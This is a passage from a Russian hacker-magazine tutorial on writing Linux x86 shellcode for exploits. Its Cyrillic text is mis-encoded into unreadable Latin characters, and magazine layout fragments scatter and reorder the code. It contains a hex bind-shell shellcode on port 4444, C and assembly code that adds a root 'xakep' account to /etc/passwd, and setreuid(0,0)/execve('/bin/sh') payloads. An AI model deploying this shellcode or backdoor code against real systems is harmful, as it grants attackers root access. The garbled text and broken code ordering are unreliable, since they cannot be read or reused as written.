ïîäñ÷åòå íå áóäåò ñîáëàçíà îáìàíóòü äðóã äðóãà. Q: Ïèøåì ñîôò ïî áîðüáå ñ CC-ì ìîøåííè÷åñòâîì. Êîãî ñîôòèíà äîëæíà îïîâåùàòü î ñëó÷èâ øåìñÿ POS-è èíöèäåíòå? A: Âîïðîñ òðåáóåò çíà÷èòåëüíî áîëåå äåòàëüíîãî îïèñàíèÿ. Äëÿ îñòàëüíûõ íàïîìíþ, ÷òî POS (Point Of Sale) — äåâàéñ äëÿ ïðîêàòêè êðåäèòîê. Ïåðâûì äîëæåí áûòü îïîâåùåí áàíê âûäàâøèé êðåäèòíóþ êàðòó, à òîò ñìîæåò ñâÿçàòüñÿ ñ äåðæàòåëåì êàðòû. Ïîòîì èäåò áàíê, êîòîðûé âûäàë ðàçðåøåíèå íà èñïîëüçîâàíèå POS'a, ïî êîòîðîìó ïðîøëà ñòðåìíàÿ òðàíçàêöèÿ (â òîì æå áàíêå îáûêíîâåííî îòêðûò ñ÷åò âëàäåëüöà POS'a). Ëîãè÷íûì áóäåò îïîâåùåíèå àäìèíèñòðàöèè ñåòè, â êîòîðîé áûëà ïðîâåäåíà òðàíçàêöèÿ (îáûêíîâåííî ñâÿçü îñóùåñòâëÿåòñÿ ÷åðåç îòöîâñêèå ñòðóêòóðû: MC/EC, VISA, AE-Centurion è ò.ä). Öåíà âîïðîñà èçìåðÿåòñÿ è çàêîíîäàòåëüñòâîì îòäåëüíîé ñòðàíû, ãäå ñèñòåìà áóäåò èñïîëüçîâàíà. Áàçà ñîôòà åäèíà, äîïèñûâàþòñÿ ëèøü íîâûå ÷àñòè ïîä êîíêðåòíûå íóæäû.  îòäåëüíûõ ñòðàíàõ îäíîâðåìåííî äîëæíû áûòü îïîâåùåíà ïîëèöèÿ è ñòðàõîâûå êîìïàíèè, êîòîðûå îáñëóæèâàþò áàíêè cardholder'a è âëàäåëüöà POS'a, áèçíåñ ñàìîãî âëàäåëüöà POS'a. BINARY YOUR’S z

049


ÂÇËÎÌ

ÍÀÉÒÈ ÓßÇÂÈÌÛÉ ÑÅÐÂÈÑ È ÏÐÀÂÈËÜÍÎ ÏÎÄÎÁÐÀÒÜ ÝÊÑÏËÎÉÒ ÍÅËÅÃÊÎ. È ÂÑÅ ÆÅ ÇÍÀ×ÈÒÅËÜÍÎ ÑËÎÆÍÅÅ ÍÀÏÈÑÀÒÜ ÝÒÎÒ ÝÊÑÏËÎÉÒ ÑÀÌÎÌÓ, ÏÐÅÂÐÀÒÈÒÜ ÒÓÑÊËÓÞ ÍÎÂÎÑÒÜ ÈÇ ÁÀÃÒÐÀÊÀ  ÐÅÀËÜÍÎ ÐÀÁÎÒÀÞÙÓÞ ÎÒÌÛ×ÊÓ. ÑÅÃÎÄÍß ß ÍÅ ÐÀÑÑÊÀÆÓ ÒÅÁÅ Î ÒÎÌ, ÊÀÊ ÍÓÆÍÎ ÏÈÑÀÒÜ ÝÊÑÏËÎÉÒÛ, È ÄÀÆÅ ÍÅ ÁÓÄÓ ÐÀÇÁÈÐÀÒÜ ÏÎÏÓËßÐÍÛÅ ÓßÇÂÈÌÎÑÒÈ Â ÑÎÔÒÅ. ÍÎ ÇÀÒÎ Ñ ÓÄÎÂÎËÜÑÒÂÈÅÌ ÍÀÓ×Ó ÑÎÑÒÀÂËßÒÜ ØÅËË-ÊÎÄ, ÍÅÎÒÚÅÌËÅÌÓÞ ×ÀÑÒÜ ��ÐÀÊÒÈ×ÅÑÊÈ ËÞÁÎÃÎ ÑÏËÎÈÒÀ

050

XÀÊÅÐ 01 /85/ 06


TEXT ÑÒÅÏÀÍ ÈËÜÈÍ / STEP@GAMELAND.RU /

ÎÒÊÓÄÀ ÁÅÐÓ ÒÑß ØÅËË-Ê ÊÎÄÛ Ó×ÈÌÑß ÏÈÑÀÒÜ ØÅËË-ÊÎÄÛ ÑÀÌÎÑÒÎßÒÅËÜÍÎ

ÊÀÊ ÐÀÁÎÒÀÅÒ ÝÊÑÏËÎÉÒ Ïðîâåäåì íåáîëüøîé ýêñïåðèìåíò. Îòêðîé â òåêñòîâîì ðåäàêòîðå èñõîäíèê ëþáîãî ýêñïëîéòà, îáåùàþùåãî ìíîãî âñÿêèõ âêóñíîñòåé, âðîäå root-øåëëà íà óäàëåííîé ìàøèíå, è íàéäè â íåì ñàìûé íåïîíÿòíûé ó÷àñòîê êîäà. Òàêîé òàì áóäåò ïðàêòè÷åñêè íàâåðíÿêà: ñìîòðè âíèìàòåëüíåå è òû åãî íàéäåøü. Ñêîðåå âñåãî, òåáå íà ãëàçà ïîïàäåòñÿ íåñêîëüêî ñòðî÷åê íåïîíÿòíûõ è íè÷åì íå ñâÿçàííûõ ìåæäó ñîáîé ñèìâîëîâ. Ñâîåîáðàçíàÿ ïîñëåäîâàòåëüíîñòü áàéò â øåñòíàäöàòåðè÷íîì ôîðìàòå, òàêàÿ êàê ýòà:

char shellcode[] = "\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a" "\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d" "\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4" "\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04" "\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe" "\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f" "\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67"; Ýòî è åñòü òîò ñàìûé øåëë-êîä, î êîòîðîì ïîéäåò ðå÷ü. Èíîãäà åãî íàçûâàþò áàéò-êîäîì, òàê êàê îí ñîñòîèò èç ïîñëåäîâàòåëüíîñòè áàéòîâ, íî ñóòü îò ýòîãî íå ìåíÿåòñÿ. Ñîäåðæèìîå øåëëêîäà — îòíþäü íå õèòðîå çàêëèíàíèå è íå ñèìâîëû, âçÿòûå îò áàëäû. Ýòî íàáîð ñàìûõ îáûêíîâåííûõ ìàøèííûõ êîìàíä, òî÷íî òàêèõ æå, êàê è â îáû÷íîì èñïîëíÿåìîì ôàéëå. Íàïðèìåð, ïðèâåäåííûé âûøå øåëë-êîä (îïðåäåëåííàÿ ïîñëåäîâàòåëüíîñòü ìàøèííûõ êîìàíä) îòêðûâàåò 4444 ïîðò íà ëîêàëüíîé Linux-ìàøèíå è ïðèâÿçûâàåò ê íåìó øåëë. Ýêñïëîéò, êîòîðîìó óäàñòñÿ âûïîëíèòü ýòîò øåëë-êîä, ïðåäîñòàâèò õàêåðó ïîëíûé äîñòóï â ñèñòåìó. Ñ ïîìîùüþ øåëë-êîäà ìîæíî òàêæå ïåðåçàãðóçèòü ñèñòåìó, îòêëþ÷èòü IDS-ñåðâèñû è honeypot, îòïðàâèòü çàäàííûé ôàéë íà ìûëî è ò.ä. è ò.ï. Âñå çàâèñèò îò òîãî, ÷òî èìåííî ïðîïèñàíî â øåëë-êîäå. Çàñòàâèòü êîìïüþòåð âûïîëíèòü øåëë-êîä — çàäà÷à ýêñïëîéòà. Âîçüìåì äëÿ ïðèìåðà ðàñïðîñòðàíåííóþ îøèáêó Buffer Overflow. Ðàçðàáîò÷èêè î÷åíü ÷àñòî äîïóñêàþò îïëîøíîñòü è íå ïðîâåðÿþò äàííûå, êîòîðûå ïåðåäàþòñÿ ôóíêöèÿì â êà÷åñòâå ïàðàìåòðîâ. Áàíàëüíûé ïðèìåð: ïðîãðàììèñò ñîçäàåò äèíàìè÷åñêèé ìàññèâ è âûäåëÿåò ïàìÿòü äëÿ 100 ýëåìåíòîâ, ïðè ýòîì ðåàëüíîå êîëè÷åñòâî ýëåìåíòîâ íèãäå íå êîíòðîëèðóåòñÿ. Òàêîå ïîëîæåíèå äåë èãðàåò íà ðóêó âçëîìùèêó, ïîòîìó êàê âñå äàííûå, êîòîðûå îêàçàëèñü çà ïðåäåëàìè ýòîãî ìàññèâà, ïîïàäàþò â ñòåê, ïðîèñõîäèò òàê íàçûâàåìîå ïåðåïîëíåíèå áóôåðà.

Çàäà÷à ýêñïëîéòà çàêëþ÷àåòñÿ â òîì, ÷òîáû ïåðåïîëíèòü áóôåð è òàêèì îáðàçîì ïîäìåíèòü àäðåñ âîçâðàòà íà òîò, ãäå íàõîäèòñÿ øåëë-êîä. Åñëè øåëë-êîä ïîëó÷èò óïðàâëåíèå, òî îí áóäåò âûïîëíåí. Âñå äîâîëüíî ïðîñòî. ÌÅÑÒÎ ÄÅÉÑÒÂÈß Íå ñòîèò ðàññìàòðèâàòü ýòîò ìàòåðèàë êàê ðóêîâîäñòâî ê íàïèñàíèþ ýêñïëîéòîâ. Öåëü ýòîé ñòàòüè — íà ïðàêòèêå ïîêàçàòü ïðîöåññ ñîçäàíèÿ øåëë-êîäà, à òàêæå åãî îïòèìèçàöèè äëÿ èñïîëüçîâàíèÿ â ðåàëüíûõ ñïëîèòàõ. Êîíå÷íî, ñóùåñòâóåò íåìàëî ðåïîçèòàðèåâ (íàïðèìåð, www.metasploit.com) ñ îòëè÷íîé ïîäáîðêîé øåëë-êîäîâ, îäíàêî èõ íå âñåãäà áûâàåò äîñòàòî÷íî. Òû ñ ñàìîãî íà÷àëà äîëæåí ïîíèìàòü, ÷òî øåëë-êîä — ýòî ïîñëåäîâàòåëüíîñòü ìàøèííûõ êîìàíä (ñàìûé íèçêèé è ñëîæíûé óðîâåíü ïðîãðàììèðîâàíèÿ), êîòîðûå ñèëüíî ïðèâÿçàíû ê êîíêðåòíîé àðõèòåêòóðå ïðîöåññîðà è îïåðàöèîííîé ñèñòåìû. Øåëëêîä, ðàáîòàþùèé â îäíîì ñëó÷àå, áóäåò ñîâåðøåííî íåïðèìåíèì â äðóãîì. Âîò ïî÷åìó òàê âàæíî ïîíèìàòü ÷òî ê ÷åìó, ÷òîáû â ñëó÷àå íåîáõîäèìîñòè ñóìåòü ñîñòàâèòü ðàáîòàþùèé øåëëêîä ñàìîìó èëè ìîäèôèöèðîâàòü óæå ñóùåñòâóþùèé. Ñðàçó õî÷ó ïðåäóïðåäèòü, ÷òî äëÿ ïîëíîãî ïîíèìàíèÿ ñòàòüè íåîáõîäèìî èìåòü õîòÿ áû ìèíèìàëüíûå çíàíèÿ àññåìáëåðà. Íàäåþñü, òû âíèìàòåëüíî ÷èòàë ââîäíûå ñòàòüè ïî òåìå â «Êîäèíãå», òàê êàê â ýòîì ñëó÷àå ïðîáëåì íå áóäåò, è ìàòåðèàë ïîêàæåòñÿ ïðîñòûì è ïîíÿòíûì.  êà÷åñòâå ïëàòôîðìû äëÿ ýêñïåðèìåíòîâ ìû âûáåðåì Linux íà ìàøèíå ñ 32-áèòíûì x86 ïðîöåññîðîì. Ïðåäâèæó òâîé ðåçîííûé âîïðîñ: ïî÷åìó Linux? Äà ïîòîìó, ÷òî áîëüøèíñòâî ýêñïëîéòîâ ïðåäíàçíà÷åíî èìåííî äëÿ Unixñåðâèñîâ, à çíà÷èò, ïðåäñòàâëÿþò áîëüøèé èíòåðåñ. Äëÿ ðàáîòû íàì òàêæå ïîíàäîáÿòñÿ íåñêîëüêî âñïîìîãàòåëüíûõ èíñòðóìåíòîâ: Netwide Assembler (nasm), ndisasm è hexdump.  áîëüøèíñòâå äèñòðèáóòèâîâ îíè ïîñòàâëÿþòñÿ ïî óìîë÷àíèþ, íî äàæå ñàìîñòîÿòåëüíàÿ óñòàíîâêà âðÿä ëè âûçîâåò çàòðóäíåíèÿ. Ññûëêè íà äèñòðèáóòèâû èùè âî âðåçêå, õîòÿ çà÷åì? Âñå íåîáõîäèìîå âûëîæåíî íà íàø äèñê. ÏÐÈÌÅÐÀ ÐÀÄÈ Çàãîòîâêè äëÿ øåëë-êîäà îáû÷íî ïèøóò íà àññåìáëåðå. Îäíàêî ìû ïîñòðîèì ïðîöåññ íåñêîëüêî èíà÷å: ñíà÷àëà äëÿ ëó÷øåãî ïîíèìàíèÿ ðàññìîòðèì ïðèìåðû íà ÿçûêå Ñ, à óæå ïîòîì — àíàëîãè÷íûé êîä íà àññåìáëåðå. ß íàìåðåííî ðàññìîòðþ äâà äîâîëüíî ïðîñòûõ ïðèìåðà, ÷òîáû íå ãðóçèòü òåáÿ ãðîìîçäêèìè âûêëàäêàìè, îò êîòîðûõ âñå ðàâíî íå áóäåò òîëêó. Î÷åíü ñêîðî òû ïîéìåøü, ÷òî ïðîöåññ ñîçäàíèÿ

Íå ñòîèò çàáûâàòü, ÷òî çà âñå íåçàêîííûå äåéñòâèÿ òû íåñåøü ïîëíóþ îòâåòñòâåííîñòü ñíà÷àëà ïåðåä ñîáñòâåííîé ñîâåñòüþ, ïîòîì — ïåðåä áëèçêèìè ëþäüìè, à ïîòîì óæå — ïåðåä ëûñûì 43-ëåòíèì ãîñóäàðñòâåííûì îáâèíèòåëåì ïî ôàìèëèè Ïåòðåíêî. Òàê ÷òî íå ãëóïè.

XÀÊÅÐ 01 /85/ 06

051


ÂÇËÎÌ ///// ISSUE

øåëë-êîäà äëÿ áîëåå ñëîæíûõ äåéñòâèé íè÷åì íå îòëè÷àåòñÿ. Èòàê, ïåðâûé ïðèìåð. Îí ñàìûé ïðîñòîé è çàêëþ÷àåòñÿ â òîì, ÷òî íàøà íåáîëüøàÿ ïðîãðàììà îòêðîåò äëÿ çàïèñè ôàéë /etc/passwd, äîáàâèò â êîíåö ñòðîêó «xakep:x:0:0::/:/bin/bash\n», ïîñëå ÷åãî çàêðîåò åãî, ñîõðàíèâ ðåçóëüòàò.

#include <stdio.h> #include <fcntl.h> main() { char *filename = "/etc/passwd"; char *line = "xakep:x:0:0::/:/bin/bash\n"; int f_open; f_open = open(filename,O_WRONLY|O_APPEND); write(f_open, line, strlen(line)); close(f_open); exit(0); } Ïðèâåäåííûé êîä ïðåäåëüíî ïðîñò è ïîíÿòåí, çà èñêëþ÷åíèåì ðàçâå ÷òî ôóíêöèè open (îòêðûòü ôàéë). Êîíñòàíòà O_WRONLY|O_APPEND, êîòîðàÿ ïåðåäàåòñÿ åé â êà÷åñòâå ïàðàìåòðà, óêàçûâàåò íà òî, ÷òî ôàéë îòêðûâàåòñÿ â ðåæèìå çàïèñè, à íîâûå äàííûå äîïèñûâàþòñÿ â åãî êîíåö. Òåïåðü ðàññìîòðèì áîëåå æèçíåííûé ïðèìåð — çàïóñê ñèñòåìíîãî èíòåðïðåòàòîðà (øåëëà). Ìóäðèòü îñîáî íå áóäåì: ñòàíäàðòíîãî /bin/sh íàì õâàòèò ñïîëíà.

îñòàëüíûõ ôóíêöèé: exit() — 1, close() — 6, setreuid() — 70, execve() — 11.  ïðèíöèïå, ýòîãî äîñòàòî÷íî, ÷òîáû íàïèñàòü âïîëíå ðàáîòîñïîñîáíûå ïðèëîæåíèÿ.

section .data filename db '/etc/passwd', 0 line db 'xakep:x:0:0::/:/bin/bash',0x0a section .text global _start _start: ; open(filename,O_WRONLY|O_APPEND) mov eax, 5 mov ebx, filename mov ecx, 1025 int 0x80 mov ebx, eax ; write(f_open, line, 24) mov eax, 4 mov ecx, line mov edx, 24 int 0x80 ; close(f_open) mov eax, 6 int 0x80 ; exit(0) mov eax, 1 mov ebx, 0 int 0x80

Ñ ÏÎÌÎÙÜÞ ØÅËË-Ê ÊÎÄÀ ÌÎÆÍÎ ÒÀÊÆÅ ÏÅÐÅÇÀ ÃÐÓÇÈÒÜ ÑÈÑÒÅÌÓ, ÎÒÊËÞ×ÈÒ IDS-Ñ ÑÅÐÂÈÑÛ È HONEYPOT, ÎÒÏÐÀ Ü ÂÈÒÜ ÇÀÄÀÍÍÛÉ ÔÀÉË ÍÀ ÌÛË Î È Ò.Ä.. È Ò.Ï.. #include <stdio.h> main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; setreuid(0, 0); execve(name[0],name, NULL); // òî æå ñàìîå, ÷òî è execve("/bin/sh",{"/bin/sh",NULL},NULL) } Êîìàíäà setreuid(0, 0) èñïîëüçóåòñÿ äëÿ òîãî, ÷òîáû óñòàíîâèòü äëÿ çàïóñêà ïðàâà root'à (åñëè ýòî âîçìîæíî). execve(const char filename, char const argv [], char const envp[]) — ýòî ãëàâíûé ñèñòåìíûé âûçîâ, êîòîðûé èñïîëíÿåò ëþáûå áèíàðíèêè è ñêðèïòû. Îí èìååò 3 ïàðàìåòðà: filename — ïîëíûé ïóòü ê áèíàðíèêó, argv [] — ìàññèâ àðãóìåíòîâ, envp[] — ìàññèâ ñòðîê â ôîðìàòå «êëþ÷=çíà÷åíèå», êîòîðûå âûñòàâëÿþòñÿ ïåðåìåííûìè îêðóæåíèÿ äëÿ çàïóñêàåìîãî ïðèëîæåíèÿ. Îáà ìàññèâà äîëæíû çàêàí÷èâàòüñÿ íóëåâûì (NULL) ýëåìåíòîì. ÀÑÑÅÌÁËÅÐ — ÏÎ×ÒÈ ÏÐÎÑÒÎ Òåïåðü, êîãäà ìû èìååì íåñêîëüêî ïðèìåðîâ, íàïèñàííûõ íà C, ïîïðîáóåì ïðåîáðàçîâàòü èõ â êîä íà ÷èñòîì àññåìáëåðå. Òåáå äîëæíî áûòü èçâåñòíî, ÷òî ñèñòåìíûå ôóíêöèè âûçûâàþòñÿ ñ ïîìîùüþ ñïåöèàëüíîãî ïðåðûâàíèÿ, êîòîðîå ñ÷èòûâàåò íîìåð ôóíêöèè ðåãèñòðà EAX è âûïîëíÿåò åå. Íîìåðà ôóíêöèé ìîæíî ïîäñìîòðåòü â ôàéëå /usr/include/asm/unistd.h. Íàïðèìåð, ñòðîêà «#define __NR_ open 5» îçíà÷àåò, ÷òî ôóíêöèè open() ïðèñâîåí èäåíòèôèêàöèîííûé íîìåð 5. Àíàëîãè÷íî íàõîäÿòñÿ íîìåðà äëÿ

052

Êàê èçâåñòíî, ïðîãðàììà íà àññåìáëåðå îáû÷íî ñîñòîèò èç òðåõ ñåãìåíòîâ: ñåãìåíòà äàííûõ, â êîòîðîì îïèñûâàþòñÿ ïåðåìåííûå, ñåãìåíòà êîäà, â êîòîðîì ñîäåðæàòñÿ íåïîñðåäñòâåííî èíñòðóêöèè ïðîãðàììû, è ñåãìåíòà ñòåêà, ïðåäñòàâëÿþùåãî ñîáîé ñïåöèàëüíóþ îáëàñòü ïàìÿòè äëÿ õðàíåíèÿ äàííûõ. Íàø ïðèìåð ñîñòîèò èç âñåãî äâóõ ñåãìåíòîâ: äàííûõ è êîäà, íà÷àëî êîòîðûõ îáîçíà÷åíî óïðàâëÿþùèìè îïåðàòîðàìè section .data è section .text. Ñåãìåíò äàííûõ ñîäåðæèò îáúÿâëåíèå äâóõ ïåðåìåííûõ: name è line, ñòðîêîâîãî òèïà, ñîñòîÿùèõ èç íàáîðà áàéò (âèäèøü ñëîâî db â îïèñàíèè?). Ñåãìåíò êîäà íà÷èíàåòñÿ ñ îáúÿâëåíèÿ òî÷êè âõîäà â ñèñòåìó global _start. Ýòà êîíñòðóêöèÿ óêàçûâàåò íà òî, ÷òî èíñòðóêöèè ïðîãðàììû ñëåäóåò âûïîëíÿòü ñ ìåòêè _start. Âñå ëîãè÷íî: ïîñëå ýòîé ìåòêè äåéñòâèòåëüíî èäåò âûçîâ íåîáõîäèìûõ ôóíêöèé è ïðîöåäóð. Òàê, åñëè íåîáõîäèìî âûçâàòü ôóíêöèþ open(), òî â ðåãèñòð EAX ïîìåùàåòñÿ åå íîìåð — 5. Çàòåì ôóíêöèè ïåðåäàþòñÿ ïàðàìåòðû. Âîîáùå ãîâîðÿ, ýòî ìîæíî ñäåëàòü íåñêîëüêèìè ñïîñîáàìè, íî â íàøåì ñëó÷àå èñïîëüçóåòñÿ íàèáîëåå ïðîñòîé: ñ ïîìîùüþ ðåãèñòðîâ EBX,ECX,EDX.  EBX ïîìåùàåòñÿ ïåðâûé ïàðàìåòð ôóíêöèè, òî åñòü àäðåñ íà÷àëà ñòðîêè name, êîòîðàÿ ñîäåðæèò ïóòü ê ôàéëó è åãî èìÿ, à òàêæå çàâåðøàþùèé íîëü (ìíîãèå ôóíêöèè òðåáóþò, ÷òîáû ñòðîêîâûå ïåðåìåííûå çàêàí÷èâàëèñü èìåííî íóëåì). À â ðåãèñòð ECX çàíîñèòñÿ âòîðîé ïàðàìåòð, ñèìâîëèçèðóþùèé ðåæèì äëÿ îòêðûòèÿ ôàéëà (êîíñòàíòà O_WRONLY|O_APPEND â ÷èñëåííîì ïðåäñòàâëåíèè). Òåïåðü, êîãäà ðåãèñòðû ñîäåðæàò íåîáõîäèìûå çíà÷åíèÿ, ìîæíî âûçûâàòü ïðåðûâàíèå 0x80. Îíî ñ÷èòàåò íîìåð ôóíêöèè èç ðåãèñòðà EAX è âûïîëíÿåò ôóíêöèþ ñ ñîîòâåòñòâó-

XÀÊÅÐ 01 /85/ 06


þùèìè ïàðàìåòðàìè. Ïîñëå ýòîãî âûïîëíåíèå îñíîâíîé ïðîãðàììû ïðîäîëæàåòñÿ, ïðè÷åì äëÿ âûçîâà ôóíêöèè write(), close(), exit() èñïîëüçóåòñÿ òîò æå ñàìûé ìåõàíèçì. Òåïåðü ðàññìîòðèì âòîðîé ïðèìåð.

section .data name db '/bin/sh', 0 section .text global _start _start: 70 0 0 PUSH

; execve("/bin/sh",["/bin/sh", NULL], NULL) mov eax, 11 mov ebx, name push 0 push name mov ecx, esp mov edx, 0 int 0x80

POP

; setreuid(0, 0) mov eax, mov ebx, mov ecx, int 0x80

TOP OF STACK

Åñëè íå áðàòü â ðàñ÷åò âûçîâ ôóíêöèè execve(), òî áîëüøàÿ ÷àñòü êîäà àíàëîãè÷íà ïðåäûäóùåìó ïðèìåðó. Òå æå ñåãìåíòû, òîò æå ïðèíöèï âûçîâà ôóíêöèè setreuid(). Ïðîáëåìà ëèøü â òîì, ÷òî â êà÷åñòâå âòîðîãî ïàðàìåòðà ïîäïðîãðàììû execve() ïåðåäàåòñÿ ìàññèâ, ñîñòîÿùèé èç äâóõ ýëåìåíòîâ. Òàêîé ïàðàìåòð óìåñòíî ïåðåäàâàòü ÷åðåç ñòåê, â êîòîðûé ñíà÷àëà ïîìåùàåòñÿ íîëü (push 0) , à ïîòîì àäðåñ íà÷àëà ñòðîêè name (push name). Ïàðàìåòðû ïåðåäàþòñÿ â îáðàòíîì ïîðÿäêå íåñëó÷àéíî. Ñòåê èñïîëüçóåò ïðèíöèï LIFO (ïîñëåäíèì ïðèøåë — ïåðâûì âûøåë), ïîýòîìó ïðè èçâëå÷åíèè äàííûõ èç ñòåêà ñíà÷àëà áóäåò ïîëó÷åí àäðåñ ïåðåìåííîé name è ëèøü ïîòîì — íîëü. Íåîáõîäèìî ïîçàáîòèòüñÿ î òîì, ÷òîáû ïîäïðîãðàììà çíàëà, ãäå ýòè ïàðàìåòðû èñêàòü, è â ýòîì íåîöåíèìóþ ïîìîùü îêàæåò ñïåöèàëüíûé ðåãèñòð ESP (ñîêðàùåíèå îò Stack Pointer), êîòîðûé âñåãäà óêàçûâàåò íà àäðåñ âåðøèíû ñòåêà. Âñå, ÷òî îò íàñ òðåáóåòñÿ, — ýòî ñêîïèðîâàòü ñîäåðæèìîå ðåãèñòðà ESP â ðåãèñòð ECX, êîòîðûé ïðè çàïóñêå 0x80 ïðåðûâàíèÿ áóäåò îáðàáîòàí, êàê âòîðîé ïàðàìåòð ôóíêöèè. ÏÎ×ÅÌÓ ÍÅÒ? Ïîëó÷åííûé êîä íà àññåìáëåðå ðàáîòîñïîñîáåí íà âñå 100%. Åãî áåç òðóäà ìîæíî îòêîìïèëèðîâàòü ñ ïîìîùüþ nasm'à, çàïóñòèòü è äàæå ïîñìîòðåòü áèíàðíèê â øåñòíàäöàòåðè÷íîì ðåäàêòîðå, òî åñòü ïîëó÷èòü ãîòîâûé øåëë-êîä. Îäíà ëèøü ïðîáëåìà: òîëêó îò òàêîãî øåëë-êîäà áóäåò íåìíîãî. Îáå ïðîãðàììû èñïîëüçóþò ñîáñòâåííûå ñåãìåíòû äàííûõ, ÷òî ïîëíîñòüþ ëèøàåò âîçìîæíîñòè âûïîëíèòü èõ âíóòðè äðóãîãî ïðèëîæåíèÿ. Ýòî çíà÷èò, ÷òî ýêñïëîéò íå ñìîæåò èíæåêòèðîâàòü òðåáóåìûé êîä â ñòåê è âûïîëíèòü åãî. Èìåííî ïîýòîìó ñëåäóþùèì íàøèì øàãîì áóäåò îïòèìèçàöèÿ ïðîãðàììû íà ðàáîòó áåç èñïîëüçîâàíèÿ ñåãìåíòà äàííûõ. Äëÿ ýòîãî ìû íåìíîãî ñõèòðèì è âîñïîëüçóåìñÿ îäíèì ïðèåìîì, îñíîâàííûì íà èíñòðóêöèÿõ àññåìáëåðà jmp (ïåðåéòè íà ìåòêó) è call (âûçâàòü ïðîöåäóðó). Îáå èíñòðóêöèè îñóùåñòâëÿþò ïåðåõîä â íóæíîå ìåñòî ïðîãðàììû, íî call, ïîìèìî âñåãî ïðî÷åãî, çàíîñèò â ñòåê àäðåñ âîçâðàòà. Ýòî íåîáõîäèìî äëÿ òîãî, ÷òîáû ïîñëå çàâåðøåíèÿ ïðîöåäóðû âåðíóòüñÿ â èñõîäíîå ìåñòî ïðîãðàììû è ïðîäîëæèòü åå íîðìàëüíîå âûïîëíåíèå. Ðàññìîòðèì ñóòü ïðèåìà íà ïðèìåðå:

XÀÊÅÐ 01 /85/ 06

BOTTOM OF STACK

053


ÂÇËÎÌ ///// ISSUE

push push push push mov Ïðàêòè÷åñêè êàæäûé ýêñïëîèò ñîäåðæèò íåñêîëüêî ñòðî÷åê øåëëêîäà

one: pop ebx [òåêñò ïðîãðàììû] two: call one db 'ñòðîêà'

ÏÅÐÂÛÉ ØÅËË-ÊÎÄ Òåïåðü, êîãäà ìû íàó÷èëèñü îáõîäèòüñÿ áåç ñåãìåíòà äàííûõ, ìîæíî ïðèñòóïèòü ê ñîçäàíèþ ïåðâîãî ïîëíîöåííîãî øåëë-êîäà. Äëÿ ýòîãî íóæíî ñíà÷àëà îòêîìïèëèðîâàòü èñõîäíûé êîä ïðîãðàììû íà àññåìáëåðå:

 ñàìîì íà÷àëå ïðîãðàììû îñóùåñòâëÿåòñÿ ïåðåõîä íà ìåòêó two, çà êîòîðîé ðàñïîëîæåí âûçîâ ïðîöåäóðû one. Íà ñàìîì äåëå íèêàêîé ïðîöåäóðû íåò, îäíàêî ñ òàêèì èìåíåì åñòü åùå îäíà ìåòêà, êîòîðîé è ïåðåäàåòñÿ óïðàâëåíèå.  ýòîò ìîìåíò â ñòåê çàíîñèòñÿ àäðåñ âîçâðàòà, òî åñòü àäðåñ ñëåäóþùåé çà call èíñòðóêöèåé.  íàøåì ñëó÷àå ýòî ñòðîêà áàéò — db 'string'. Ïîëó÷àåòñÿ, ÷òî ê ìîìåíòó, êîãäà íà÷èíàåòñÿ îáðàáîòêà ìåòêè one, â ñòåê óæå áóäåò ïîìåùåí àäðåñ íà÷àëà ñòðîêè. Íàì îñòàåòñÿ ëèøü èçâëå÷ü åå è èñïîëüçîâàòü, êàê çàáëàãîðàññóäèòüñÿ. Ïîïðîáóåì ýòèì âîñïîëüçîâàòüñÿ â ðåàëüíîé ïðîãðàììå: äëÿ ýòîãî ìîäèôèöèðóåì íàø âòîðîé ïðèìåð. Äëÿ óäîáñòâà íàçîâåì åãî shell.asm, òàê êàê äàëåå áóäåì ðàáîòàòü òîëüêî ñ íèì.

BITS 32

jmp one: pop

70 0 0

two ebx

; execve("/bin/sh",["/bin/sh", NULL], NULL) mov eax, 11 push 0 push ebx mov ecx, esp mov edx, 0 int 0x80 two: call db

one '/bin/sh', 0

Êàê âèäèøü, íèêàêèõ ñåãìåíòîâ áîëüøå íåò. Ñòðîêà /bin/sh, êîòîðàÿ ðàíåå õðàíèëàñü â ñåãìåíòå äàííûõ, òåïåðü èçâëåêàåòñÿ èç ñòåêà â ðåãèñòð EBX. Êðîìå ýòîãî, äîáàâèëàñü íîâàÿ äèðåêòèâà BITS 32, îòâå÷àþùàÿ çà îïòèìèçàöèþ äëÿ 32-áèòíûõ ïðîöåññîðîâ.  ïðèíöèïå, ìîæíî áûëî ïîñòóïèòü èíà÷å: ñàìîñòîÿòåëüíî çàíåñòè â ñòåê ñòðîêó è èçâëå÷ü åå ñ ïîìîùüþ óêàçàòåëÿ íà âåðøèíó ñòåêà ESP. Ïðîâåðíåì òàêîé ôèíò ñî ñòðîêîé «hello, world!»:

054

Ñòðîêà çàíîñèòñÿ â ñòåê ñ êîíöà: ñíà÷àëà èäåò \n! (â øåñòíàäöàòåðè÷íîì êîäå 0x0a21), ïîòîì dlro (0x646c726f), äàëåå w ,o (0x77202c6f) è lleh (0x6c6c6568).  êîíöå êîíöîâ çíà÷åíèå èç ðåãèñòðà ESP (àäðåñ íà÷àëà ñòðîêè) çàíîñèòñÿ EBX. Ëèõî? Ýòîò ñïîñîá áîëåå ýôôåêòèâåí, òàê êàê ñóùåñòâåííî ñîêðàùàåò øåëë-êîä, îäíàêî ìåíåå óäîáåí.

Ïðîãðàììà íà C, çàïóñêàþùàÿ øåëë-èíòåðïðåòàòîð

jmp two

; setreuid(0, 0) mov eax, mov ebx, mov ecx, int 0x80

word 0x0a21 0x646c726f 0x77202c6f 0x6c6c6568 ebx, esp

$ nasm shell.asm

È ïðîñìîòðåòü ïîëó÷åííûé áèíàðíèê ñ ïîìîùüþ ïðîãðàììû hexdump:

$ hexdump -C shell

